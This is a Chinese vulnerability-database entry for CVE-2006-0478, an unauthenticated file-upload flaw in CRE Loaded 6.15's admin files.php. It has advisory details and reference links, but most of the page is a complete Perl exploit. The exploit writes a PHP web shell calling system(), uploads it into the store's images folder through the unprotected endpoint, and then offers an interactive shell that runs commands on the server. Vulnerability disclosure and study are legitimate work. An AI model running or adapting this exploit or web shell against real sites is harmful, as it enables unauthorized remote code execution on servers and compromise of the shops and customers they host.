CRE Loaded Files.PHP访问验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109670 漏洞类型 访问验证错误
发布时间 2006-01-24 更新时间 2007-01-24
CVE编号 CVE-2006-0478 CNNVD-ID CNNVD-200601-376
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1446
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-376
|漏洞详情
CRELoaded6.15访问验证漏洞,远程攻击者可以通过直接请求files.php执行具有特权的操作,包括上传和创建任意文件。注意:供应商声称"在我们的网站上最初已公布了此风险...并且网站上还提供了补丁程序,将用于关闭所有已知6.0x和6.1x发行版上的漏洞。我们强烈建议已安装基于HTMLArea的WYSIWYG编辑器和AdminAccesswithLevels的CRELoaded6.x、osCMax和其他osCommerce用户尽早修改安装"。
|漏洞EXP
#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda <kaneda@blacksecurity.org>
#
# Rather simple exploit, but still an exploit nonetheless.  Attempts to upload php script and 
# utilise that to execute commands, and show off a fake shell.
#
# Can specify:
# 	* User-defined PHP script or one provided in this script (suits most occasions)
# 	* Additional variables to pass to PHP script after upload
# 	* HTTP proxy
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz
#

print "creLoaded <= 6.15 HTMLAREA automated perl exploit\nhacked up by kaneda\n";

use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;
use Term::ReadLine;

my $baseurl = "/admin/htmlarea/popups/file/files.php";

my $status = getopts('s:p:a:');
if(@ARGV < 1) { die(usage()); }

my %vars, $response, $masterurl, $browser, $cmd;
$masterurl = @ARGV[0];
$browser = LWP::UserAgent->new;

if($opt_s) {
	print "[*] User-defined script '$opt_s' will be used instead of 'default'\n";
}

if($opt_p) {
	$browser->proxy(['http', 'https'] => $opt_p);
	print "[*] HTTP/HTTPS proxy set to $opt_p\n";
}

if($opt_a) {
	@tmp = split(",",$opt_a);
	foreach $tmpvar (@tmp) {
		@tmp2 = split("=",$tmpvar);
		$vars{$tmp2[0]} = $tmp2[1];
		print "[+] Adding variable '" . $tmp2[0] . "' with value '" . $tmp2[1] . "'\n";
	}
}

sub usage 
{
	print "usage: creloaded615.pl [-s/path/to/file.php] [-phostname:port] [-avarname1=value1,...,varname2=value2] URL\n\n";
	print "-a - additional variables i.e. -aaction=create,cid=12\n";
	print "-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080\n";
	print "-s - specify path to user-defined script instead of using default\n";
	print "URL - http://vuln/store\n\n";
	exit;
}

sub sendform 
{
	if($opt_G) {
		my $url = $masterurl . "?";
		# Non-issue, but could beautify the single line here at a later date.
		foreach $tmp (keys (%vars)) {
			$url .= "\&$tmp=" . $vars{$tmp};
		}
		$response = $browser->get($url);
		die "Failed to get!" unless defined $response;
	} else {
		$response = $browser->post($masterurl, \%vars);
		die "Failed to post!" unless defined $response;
	}
}

if(!$opt_s) {
	# Lazy.
	print "[*] Creating 'default' PHP script\n";
	$tmp = "<?php system(\$a); ?>";
	open(FILE, "> /tmp/default.php");
	print FILE $tmp;
	close(FILE);
	$opt_s = "/tmp/default.php";
}

open(FILE, "< $opt_s");
@content = <FILE>;
close(FILE);

if(!$vars{"dirPath"}) {
	print "[*] Setting upload path to $masterurl/images\n";
	$vars{"dirPath"} = "/../images/";
}
$tmp = $masterurl . $baseurl;
print "[*] Abusing creLOADED\n";
$browser->timeout(10);
$req = POST $tmp, Content_Type => 'form-data', Content => [ actions => "upload", dirPath => $vars{"dirPath"}, upload => [ $opt_s ] ];
$response = $browser->request($req);
$browser->timeout(180);
$term = Term::ReadLine->new('cre');

print "[*] Executing 'id' then spawning fake shell\n";
$masterurl = $masterurl . "/images/default.php";
$vars{"a"} = "id";
&sendform;
print $response->content;
while(1) {
	$prompt = "bash-2.05b\$ ";
	$tmp = $term->readline($prompt, "");
	$cmd = $tmp;
	
	if(($cmd eq "quit") || ($cmd eq "exit")) {
		exit;
	}

	$vars{"a"} = $cmd;
	&sendform;
	print $response->content;
}

# milw0rm.com [2006-01-24]
|参考资料

来源:BID
名称:16415
链接:http://www.securityfocus.com/bid/16415
来源:VUPEN
名称:ADV-2006-0373
链接:http://www.frsirt.com/english/advisories/2006/0373
来源:SECUNIA
名称:18648
链接:http://secunia.com/advisories/18648
来源:XF
名称:creloaded-files-auth-bypass(24377)
链接:http://xforce.iss.net/xforce/xfdb/24377
来源:OSVDB
名称:22793
链接:http://www.osvdb.org/22793
来源:VIM
名称:20060203vendorack/fix:22793:CRELoadedfiles.phpUnauthenticatedArbitraryFileUpload(fwd)
链接:http://www.attrition.org/pipermail/vim/2006-February/000527.html